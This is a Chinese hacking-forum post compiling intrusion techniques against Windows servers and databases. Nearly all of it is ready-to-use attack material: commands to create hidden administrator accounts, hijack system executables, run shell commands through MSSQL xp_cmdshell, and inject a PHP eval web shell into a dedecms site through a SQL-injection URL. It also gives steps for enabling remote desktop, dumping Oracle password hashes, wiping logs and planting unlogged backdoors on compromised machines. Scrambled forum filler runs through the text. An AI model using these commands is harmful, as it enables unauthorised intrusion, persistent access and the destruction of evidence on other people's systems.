找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 4936|回复: 0
打印 上一主题 下一主题

渗透技术大全

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 21:24:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
8 a8 S3 q1 Y* p
1.net user administrator /passwordreq:no' m$ Q  {5 E& D/ r& ^1 X8 r
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
3 w. Q7 n- Y  _2 y1 w9 u2.比较巧妙的建克隆号的步骤( \+ z4 q. b, v5 W3 F6 k
先建一个user的用户
& A! o- l  L- {* H8 F2 C& O然后导出注册表。然后在计算机管理里删掉; D  y5 d/ ^5 m! j5 f$ }
在导入,在添加为管理员组
: G: K' _% E1 F; f, M. J- Q3.查radmin密码
% k: d. U" H: l6 c7 O6 `reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
& P  d9 ~( r6 X( ?/ o4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
* q& }. W2 E' [" F. H; O建立一个"services.exe"的项* r' ~0 o( l2 J
再在其下面建立(字符串值)3 ?1 _" T+ R- P0 J
键值为mu ma的全路径
9 ?2 e" s. L5 y/ S  n4 W) ~5.runas /user:guest cmd
/ L0 D) k# h- Q5 Z5 \" H. G: Y测试用户权限!
+ c4 `% W+ X1 i0 S2 x6.、 tlntadmn config sec = -ntlm    exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'--   其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?; ^  s! C. a. J3 [' m4 r
7.入侵后漏洞修补、痕迹清理,后门置放:: n- t" l5 G6 g, p1 L" y/ S
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门9 x+ m& ~3 h. a% i8 T0 I' o4 W, L
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
2 J+ j1 W( b' V$ \  x4 H$ r
# ]! p1 U! Z3 L' ~# D" pfor example
; x! @6 f' t+ `  h- w9 R) \
* Z, H# m2 Z9 M* S/ {declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
( K: c) ?& U: r7 N4 K. Z" _" W: t
4 C! r8 M' D  T* F) @  E4 vdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'6 d6 [# Q1 Q+ n) u- V! _& P" s. S& h
8 S) m* z; k: `2 Z
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了7 B' g* p2 ?2 g1 A; T( r" }# g% f
如果要启用的话就必须把他加到高级用户模式. d% F5 V4 G* ?
可以直接在注入点那里直接注入& [+ K! Y4 a5 \- F$ [, M
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--/ |( P  J+ D4 O7 W; n6 P! Q
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--4 C# x2 V# s1 a( Y+ z1 H: o9 [; v
或者% \9 d  l5 N8 A( m& q& z
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'0 ]" g- ?. L" i$ g
来恢复cmdshell。( Z& o6 ~% A1 ~: t

& x) X$ I& v! ~  q0 _% @/ L7 C分析器
1 b7 I8 M, E& W; J( F6 K8 UEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
. I; C5 k5 q% D+ _% |# ]然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll"). C0 z: ]2 _( v
10.xp_cmdshell新的恢复办法
+ `, J, S; n2 Dxp_cmdshell新的恢复办法+ j3 {( T* b) `8 }
扩展储存过程被删除以后可以有很简单的办法恢复:
! C, q8 B% H4 e2 d7 R% z" _: V! D删除$ |. Q$ ?8 R  e. T: a
drop procedure sp_addextendedproc
. b- n/ c  I- R  mdrop procedure sp_oacreate% V) ?% ?; F7 d% f& |
exec sp_dropextendedproc 'xp_cmdshell'
: G: c( P& S& m# D4 o4 P: I  J! V$ ]' }% h
恢复: k7 w2 H+ s# N! S) U3 ^2 J. d, i
dbcc addextendedproc ("sp_oacreate","odsole70.dll")* S# y' S* g. u# ]
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")- R8 ~% {* j* R/ d
8 n9 U3 \: a9 {  J
这样可以直接恢复,不用去管sp_addextendedproc是不是存在. ], ~' t) u* T0 e
( ~! }! y+ @. k4 W7 v" Q
-----------------------------0 ~( P3 z5 Q4 ^9 q, @5 E

! u  o- C4 z9 J# Y) O; s删除扩展存储过过程xp_cmdshell的语句:& b  V8 s1 |8 D& S' P
exec sp_dropextendedproc 'xp_cmdshell'
2 b/ H! C- D& H; E6 S" J
- G5 r2 f- i& ^  q: r7 z, q" e恢复cmdshell的sql语句  f0 _9 b* o- Z7 ?' o$ U5 a
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'9 D/ ^; o. E3 \  F
* v0 o8 H2 y) |' w  J9 d

* \/ o; p3 `$ G$ J/ t5 p9 c6 a' i开启cmdshell的sql语句5 x' f4 i- B7 r0 I2 F. P* B% Q

4 T. }0 x& D- y1 Y+ Pexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'/ C3 b& I( J# ^6 u" A

2 _- z8 L: g, t) K8 |1 {判断存储扩展是否存在
* ?6 A, @+ u2 \select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'# |' h% c4 k# E1 c# D
返回结果为1就ok
; V! Y# e3 D& l4 W
, c, \6 h7 s+ I9 I恢复xp_cmdshell! X: V  y1 B1 s
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
) k5 W* J* H6 C返回结果为1就ok" _# ]5 Y% I- M, E* N

" d' _( ~/ w8 `) A2 ?% _否则上传xplog7.0.dll
/ [" z) t! j0 F# w4 Qexec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
9 q. I! [/ u' f& M/ y, y
) s4 Z0 _) T; b- V5 a堵上cmdshell的sql语句
* ]( W2 A( {( k% A& Gsp_dropextendedproc "xp_cmdshel
, ?6 d9 L- Q7 C+ F; i' N6 V9 c-------------------------
+ |5 C# V. i. J# s. {5 P清除3389的登录记录用一条系统自带的命令:$ g- ?1 z' C3 s, p1 _* Q
reg delete "hkcu\Software\Microsoft\Terminal Server Client"  /f
$ L: {  z3 y$ v# P6 u3 ]+ K" {6 P: p9 b3 J
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件5 y+ q& x+ z! t0 B' |
在 mysql里查看当前用户的权限
0 Y: I* H$ G6 ^0 d3 B/ Yshow grants for  
/ F) @. x+ C4 B7 T) @
, x0 f3 S; t+ M# U' v以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
5 ?5 o# b8 N5 A2 w# y2 _; V1 e6 n& s3 Y8 r1 u( J- t
! ~) ?8 o4 R5 |, d- N* U
Create USER 'itpro'@'%' IDENTIFIED BY '123';
$ V2 |0 l+ q# \. G! w& d9 Z/ E# K) \$ m; [
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
% o( w8 U# l/ F+ g/ ^  x; F; ?- r* t' i7 F- p6 w
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
& z, M+ m7 v" h" Q7 k7 _& ?' F9 @
1 K) @9 Q5 E  V( P4 WMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;; a; g8 ^0 Z- `3 U

5 v% V- U& j# C- b8 D$ j# y, ~搞完事记得删除脚印哟。
% f" B4 Z* `% C# `0 o
2 ^# i5 \4 J) {8 [( dDrop USER 'itpro'@'%';  l/ E- x- Q9 t0 E1 q0 N

% J0 P8 v9 d0 @3 zDrop DATABASE IF EXISTS `itpro` ;1 {+ }6 o6 t8 A6 v

1 {$ ?. ^  a, \  Y8 e当前用户获取system权限
3 E8 H) Q% Q. j5 |7 g! h# n% dsc Create SuperCMD binPath= "cmd /K start" type= own type= interact! M+ O/ w- ]4 v2 ^9 K* \6 y1 a2 o
sc start SuperCMD( x% R: g  s& @$ m4 i+ x8 u2 t
程序代码* e& i! A$ B' Q0 Y  Z
<SCRIPT LANGUAGE="VBScript">% Z% z6 ]6 a* H) Y
set wsnetwork=CreateObject("WSCRIPT.NETWORK")7 n2 E- X/ J- x# i- C' z2 p0 F; t
os="WinNT://"&wsnetwork.ComputerName
$ V7 {* V. r8 E  j3 fSet ob=GetObject(os)
8 C8 j; a6 R( J! XSet oe=GetObject(os&"/Administrators,group")
5 x9 r: e; Z. z( ?/ tSet od=ob.Create("user","nosec")
4 @" b. d% K5 Z, Uod.SetPassword "123456abc!@#"
& t7 n% t: j3 [: Y0 pod.SetInfo
' h# A6 m5 q$ g! S' KSet of=GetObject(os&"/nosec",user)% p5 ~% n8 Q. q! H/ F+ `8 U+ K
oe.add os&"/nosec"
# J2 V5 A  p- @9 w, E& r' N$ H0 J8 P</Script>) d0 o- H" q. D: t! f- w5 B
<script language=javascript>window.close();</script>
+ k& m+ `/ n$ U* Y  [. ~. W8 W# Z% v# \2 @* x. [" Z

; `3 F% W8 C7 w' |5 c: p' x/ ~; I9 d7 Y5 N3 v

% D& \9 k" J3 N5 S2 j' v8 Z2 S! {突破验证码限制入后台拿shell
# z% K' a3 I* T- l$ T9 \程序代码
! G, u1 M: {! b( uREGEDIT4 3 P7 [& N8 H+ B8 {) S' T
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] 3 ~; n2 a! G' T" e' `* w  S' A& i" _
"BlockXBM"=dword:00000000+ w' O) D6 [# J! d' F3 p
9 ]* t7 E* f* h  @2 I
保存为code.reg,导入注册表,重器IE! S) i; L7 [0 E! J4 K, P1 f( t6 o# x
就可以了( _# V! E8 W/ j# [) r
union写马
1 I" f" C/ P) |) A( X5 w+ ~: @* c2 t程序代码" W1 J2 Z3 d9 L) `$ {  {+ p
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*6 X3 a. U& y( }! |
) ^( C5 V) i* p
应用在dedecms注射漏洞上,无后台写马
" v) t) |# B9 L3 {dedecms后台,无文件管理器,没有outfile权限的时候
; y7 {) h* Q* i3 o. U2 {3 ^- y# Z在插件管理-病毒扫描里
, G6 E2 n5 H8 U& S写一句话进include/config_hand.php里7 H1 D+ L- d1 p+ i2 J- W( |
程序代码
) d: H- E  {/ A: A9 D$ I. j& S>';?><?php @eval($_POST[cmd]);?>: [7 e! Q! w+ l
& `/ L& J4 v6 s/ v' e4 P

0 b8 o1 o1 v& J6 C: n" t1 q; [  a0 w如上格式+ d; F0 b3 a& _! D, C$ Z

) s( [  H) g- S) W1 `; @+ {oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
& r) h7 b- I) G程序代码5 \& Q5 @# D1 \  y- I" p3 u
select username,password from dba_users;0 O6 F' |7 r# j3 I1 j7 d+ A
6 H& S/ ^" D! ^
1 k5 Z; ?" G# o4 a8 T' n" g0 F
mysql远程连接用户& b* g1 h! u: ^3 n+ A
程序代码
# c6 d8 t" S' z% f# j
% B4 c: a/ e/ b' U; p# I" aCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
1 b: d- Y2 h5 T8 }7 [GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
# J! R0 D% N: m3 cMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
/ j% ~& M* q, x" U+ @  d9 U/ uMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
! I  K2 p! \8 r! n. T# f8 V$ L  V0 J! ]: u8 Y  [
/ X: S; I" b& |7 w* ^
4 v* A) J6 t4 F
" p5 Q- x4 n' U; D  j# n; Y/ ~
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
) V  A$ G1 `  u; @0 K2 g. t7 C9 R% C8 r0 R9 M) h+ x
1.查询终端端口
/ n; r& f5 G' i7 A0 ^4 T- ~+ Q' s; z% W& e( l# ~) a% G3 y$ E% I
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
6 g5 ~6 R+ i; r2 T0 {/ r$ W& w/ t
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
' x  T+ I2 W2 D+ u* Utype tsp.reg1 l& C! @) q% g# A4 i8 ^, x
- t8 h2 N+ [& v: ]; J
2.开启XP&2003终端服务
% c1 p; A  o9 C% g
  T' c/ p8 e, q( E9 D. X
5 B" E7 p, T# M) ?* FREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f3 K, t6 X+ E# i$ U6 D  V' F5 v

& e& S8 z2 l, E5 G
1 `2 d% Q/ D' F5 n9 y2 \* xREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f/ H: H, p5 X& g. Q( O/ t
! i9 A1 q" R! n$ D1 m/ h- g
3.更改终端端口为20008(0x4E28)8 |, Q" ~* R3 u
( `# ?# h: k0 }, T% c7 b" u
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f+ ~% S3 a8 V' N/ }& K4 x
0 w* F! a/ e. s) ?: c
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f! D6 y) L2 J" J1 n* H1 V( ~
- w" s6 L% U0 o9 o$ l+ E* W7 V! B
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
. @: I& [' P: I  E$ [' D# b
5 A4 r% ~/ [9 l1 ]9 u' zREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f4 M9 L( }% {9 \1 J2 ^

( w5 I, [% @6 a
  E9 t, @6 h: d+ M6 ^! @' o5.开启Win2000的终端,端口为3389(需重启)
# y0 ~6 u( {1 v6 f% M1 G1 b0 u! F3 U$ r8 }4 k  z# q: e3 k0 d3 @
echo Windows Registry Editor Version 5.00 >2000.reg 8 w" w' x9 t9 Q! w9 k6 f) L7 @$ v
echo. >>2000.reg; e( L  J: y: ~
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg 3 W) {, Z: p( Q7 D- R) l7 u+ p
echo "Enabled"="0" >>2000.reg
4 y. v+ G& O0 s( R2 k& wecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg ; F2 Q+ D0 _. z: s  ~3 s2 R
echo "ShutdownWithoutLogon"="0" >>2000.reg ' O+ C) V# \+ H: r
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
( N6 O& M+ a& ~* w8 N; d* E- u9 vecho "EnableAdminTSRemote"=dword:00000001 >>2000.reg
8 {. P1 Q( d1 ^/ r8 Cecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg & D, I0 A3 j$ O* J7 [! @- z
echo "TSEnabled"=dword:00000001 >>2000.reg ! e; A$ ?* w! G$ R# }8 o
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg - R. l8 y! |- F
echo "Start"=dword:00000002 >>2000.reg $ A0 Y- |5 m; F+ s5 n
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
) L1 X% l( z8 `* b' H, mecho "Start"=dword:00000002 >>2000.reg & P6 e- j- j& Z, T- F
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
! ~0 k6 b+ O- U5 I# f' uecho "Hotkey"="1" >>2000.reg
* k4 ^3 C7 [4 y9 V0 C6 A: V& Decho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
' S/ g* S' \( r. P1 Wecho "ortNumber"=dword:00000D3D >>2000.reg
( I" o2 Y( v# p+ o; P8 [% {echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
. a5 l; V! c! g# Q2 yecho "ortNumber"=dword:00000D3D >>2000.reg
- P( [7 t( H& X0 z
4 m" r- |+ ?* }% s& v' m9 H# j6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)/ z! w9 w; F6 D* n3 P' F

# u. u. b8 f8 d% y@ECHO OFF & cd/d %temp% & echo [version] > restart.inf* d( _; Z$ w( v2 S9 m! D
(set inf=InstallHinfSection DefaultInstall)  i9 v/ m8 t' u6 f
echo signature=$chicago$ >> restart.inf
7 E: j8 Q0 g* T! C  I: [echo [defaultinstall] >> restart.inf; K. q" W8 \6 p- T! ?( ~, l
rundll32 setupapi,%inf% 1 %temp%\restart.inf1 D7 @; T) e* E+ |3 ]9 U5 [, @7 \

. l& k% K5 M. F6 I
# r% I* _- c7 g: G0 r' W2 D7.禁用TCP/IP端口筛选 (需重启)
' ]' p( q4 j- M7 s* R2 ^% B. W, B: v& q' t
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f: M% t) X0 F0 H4 D# Q

: X* n0 v2 y/ ~- D+ ]* t( ^/ h8.终端超出最大连接数时可用下面的命令来连接- i: C' f& t. f' m
7 C: [0 C* y4 Z9 }
mstsc /v:ip:3389 /console
( k3 |2 b/ `- G
) h$ a: n. s4 b  T; X7 e! O2 T0 n9.调整NTFS分区权限
3 k! n! j/ k$ E) s1 S8 O+ k9 x: u/ M9 Y6 U- [9 E# h4 H6 r% S
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
2 f/ a" Y0 u; m; y1 z2 ]% W4 q( Q7 T2 v) G
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)) c1 ]! D  ]; S/ X3 k3 u2 v

$ V# Y& A# V: \3 I  u; i------------------------------------------------------3 ?' S, j2 X% I8 ~& t- X" e
3389.vbs
1 S8 |8 ?' G# J: ^+ M- ]! w( n1 |$ SOn Error Resume Next
) H" [% R# {1 L( U& S( Hconst HKEY_LOCAL_MACHINE = &H80000002" z% _( J% ^1 C5 v8 l
strComputer = "."2 h* y( k1 j% G" t" b9 k/ y
Set StdOut = WScript.StdOut- |3 }% J& U% z0 @9 b
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
0 ^3 @4 p+ F4 L+ Y8 |* E* [5 istrComputer & "\root\default:StdRegProv")
' o' ~! i; P& PstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"9 w+ S, B9 Z& T1 ?; b. d, u
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
4 R" x# A- _" S" MstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
: B9 J, l$ Y8 j) J% }6 `  S: S1 Z0 soreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath. B* s( T( _) `$ B, C6 \) D# ]
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"6 g1 `. Q; P; Z& g, |# u
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
8 a7 \9 |, Q# h) v  ystrValueName = "fDenyTSConnections"6 G/ x- }1 L0 i) y8 y) c3 c
dwValue = 0* W% s: i  v& I6 x2 Q* w1 t
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue7 m& g, J4 w5 f+ S" Y
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
/ |# ?# P; O5 r! Y: ^8 VstrValueName = "ortNumber"' O6 R  V, U. D) `# `9 Z' u
dwValue = 3389
- i0 o5 q9 b# D9 m1 x( R. Ioreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
. r. B4 [' T! H& j- bstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"7 s3 s% o8 w( Y, N  t
strValueName = "ortNumber"4 U+ O( D& E0 o# Q5 h9 a1 s
dwValue = 3389/ S: W& @; f6 j+ X+ D) W- {  L+ |
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
' b9 }4 L( j. \. A% B8 ySet R = CreateObject("WScript.Shell") - B* {6 n; q; m
R.run("Shutdown.exe -f -r -t 0") + |/ C3 t: x1 V
. f+ ~! o: N2 Q3 I+ g6 z; k" p  N0 A
删除awgina.dll的注册表键值& f$ K$ M1 h' ~! Z  r
程序代码
, o( A' Y' y. F' ?- y" [
0 ]6 F3 v3 j" V( ]& ]reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
$ U6 n- C7 M9 L7 e! _
. g" e7 O5 }* c5 V, \. ~3 r- L+ M+ I) ]8 w2 C4 a6 b5 y8 b$ {

& {1 l) s( o$ @) ~& _/ |1 q( j( B, d
程序代码( y6 }* t' t: G1 K
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
( `2 p; [: j7 z& [7 {1 q8 {0 k1 m: E) U$ R- I* k. |
设置为1,关闭LM Hash5 t2 V# U3 S8 K' z6 m
0 m( R/ Y. M( `1 a' v- B: T
数据库安全:入侵Oracle数据库常用操作命令
! ^# Y: ]4 h* _0 r9 [/ }5 I最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。7 M9 m; f1 X" y* T
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。$ ^! z5 b1 E  U7 ~4 K( K9 s
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
9 ?. o5 N; @6 H$ w3 l. ?3、SQL>connect / as sysdba ;(as sysoper)或- ^6 p' l7 x6 }2 p' y2 ^- H. i# D9 V
connect internal/oracle AS SYSDBA ;(scott/tiger): b  N$ q2 [; L9 t2 U  u1 B
conn sys/change_on_install as sysdba;
1 e- J- l; z  w4、SQL>startup; 启动数据库实例
  M# [1 G9 F6 S. s. [) q5、查看当前的所有数据库: select * from v$database;
& X' g4 p! D% h; m! u/ ~8 Bselect name from v$database;
) X/ w7 m5 t; \* J" Y, ^6、desc v$databases; 查看数据库结构字段  Q2 V: ]2 u  V% D: L
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:9 g  ]! c# |8 M# I5 a
SQL>select * from V_$PWFILE_USERS;& N' C5 G4 o) _
Show user;查看当前数据库连接用户) m, [" k$ [: H2 i
8、进入test数据库:database test;
) f+ a) E3 d; z' |9、查看所有的数据库实例:select * from v$instance;
$ `1 ^  H6 ?) A5 `! }' R. c如:ora9i; c; u5 R: G( {; e7 J
10、查看当前库的所有数据表:/ ]% r+ M! Y! a9 E0 B
SQL> select TABLE_NAME from all_tables;/ H& y& V% Q$ K8 y! `' ?
select * from all_tables;
0 _( X3 X1 X$ s" |# N  qSQL> select table_name from all_tables where table_name like '%u%';
5 ^  t" h7 F3 l' g( [: qTABLE_NAME
5 F  R/ W( u  S6 P------------------------------& k4 j: |" M- W2 }4 ]/ Y
_default_auditing_options_
( G9 ~+ c3 ~. m, K7 L11、查看表结构:desc all_tables;+ s# X6 [/ X7 O9 b& u+ f+ U
12、显示CQI.T_BBS_XUSER的所有字段结构:
% Z+ c( Z7 q8 e$ cdesc CQI.T_BBS_XUSER;/ B& U. d  `. l- m% w
13、获得CQI.T_BBS_XUSER表中的记录:9 }' f( z8 ?2 F# }, i) |
select * from CQI.T_BBS_XUSER;5 z" J1 c$ M3 F6 p+ {
14、增加数据库用户:(test11/test)
1 X4 N$ _$ s, g; s) qcreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;+ W& a1 F7 a. v/ q- l( h
15、用户授权:+ c' ^. K" ~0 h# N/ f; a4 k
grant connect,resource,dba to test11;2 v" C3 N# b6 X
grant sysdba to test11;
2 }3 G! i: T0 P! D9 T4 x7 P, zcommit;
$ Z8 ?: \; A7 [& l16、更改数据库用户的密码:(将sys与system的密码改为test.)& |  V! J5 z. `$ P9 X# i) J2 M
alter user sys indentified by test;& U& m1 x4 c6 B! V+ N
alter user system indentified by test;
% y) k& v; v4 I6 {" P, V2 D7 L' U# t# ~, s# I3 v. A8 L* d
applicationContext-util.xml
# {: d5 T3 ]6 x' fapplicationContext.xml
; G# n- c& l3 J' l: y' `struts-config.xml( P: Z2 K! }6 e; H2 A
web.xml
* u: I" h2 L' U% qserver.xml
, j. I$ f8 v. |tomcat-users.xml
- A: Z+ [4 e$ u6 K9 P. Thibernate.cfg.xml/ V6 O( v+ v3 G; I' V
database_pool_config.xml/ S. h/ B/ l' p2 N$ h4 S; C
, N, Z8 O+ |% m0 n% |2 L( W# V

% C7 r6 C- `7 A/ j1 {\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置2 L! r- H8 U# x& N& H
\WEB-INF\server.xml         类似http.conf+mysql.ini+php.ini" l# E( X- e7 D; |4 `& y
\WEB-INF\struts-config.xml  文件目录结构6 P; W/ M1 m( v7 G1 [0 K. n8 Y+ B+ Y/ n
! t6 q, s! E6 Z0 r1 B; G3 W, Y- k
spring.properties 里边包含hibernate.cfg.xml的名称
( I- N/ _9 D3 e/ W2 `  L/ x( ~3 a/ ]: `' P% T7 W' r& Y7 l
# g8 _: Z' T- b; w1 L
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
6 y( y; i: _# E/ U& r6 x
; w/ R- i. E( x% s& X9 [, B  E如果都找不到  那就看看class文件吧。。
, R, w/ |& U" X* P' h' _: `& P% ?- m6 V! E6 d6 I
测试1:0 Q. O0 A$ Q1 U: ^7 @1 L3 U
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
$ ]9 ~6 t, @* R4 S0 v
/ M% U4 [# @& i+ X测试2:
* H' ?) D" V8 A  ?2 x6 i
% [8 b6 p& Y3 w* A/ ]create table dirs(paths varchar(100),paths1 varchar(100), id int)- u/ ~0 M# I+ M& x1 n

# n9 R' v. Z0 z- `4 u. z9 Ydelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--" e/ w+ J  D. X* F9 ~7 r
: [. E* f$ ~7 `! Q1 y) k
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1) B* O" u! d: N; t+ K: ~5 i

+ k5 j6 ^: a# O3 u9 s0 G8 c3 u查看虚拟机中的共享文件:# u$ }2 P* G; w! T+ S) a3 l
在虚拟机中的cmd中执行
- [2 D5 S4 g2 K) I' T\\.host\Shared Folders6 J% y) H8 C! ~; N1 |

  K, S' g! C1 a% V  A0 j3 }cmdshell下找终端的技巧
8 r& y$ U. T, e找终端:
  q7 l/ R8 C8 x( b3 U* A6 A第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
7 q8 z9 H; d" x& y: A   而终端所对应的服务名为:TermService
/ q6 z2 D0 T9 a" k! r1 H第二步:用netstat -ano命令,列出所有端口对应的PID值!
0 j/ e$ N/ x& d1 B& j  }/ l   找到PID值所对应的端口1 g  Z4 O+ Z1 s# J
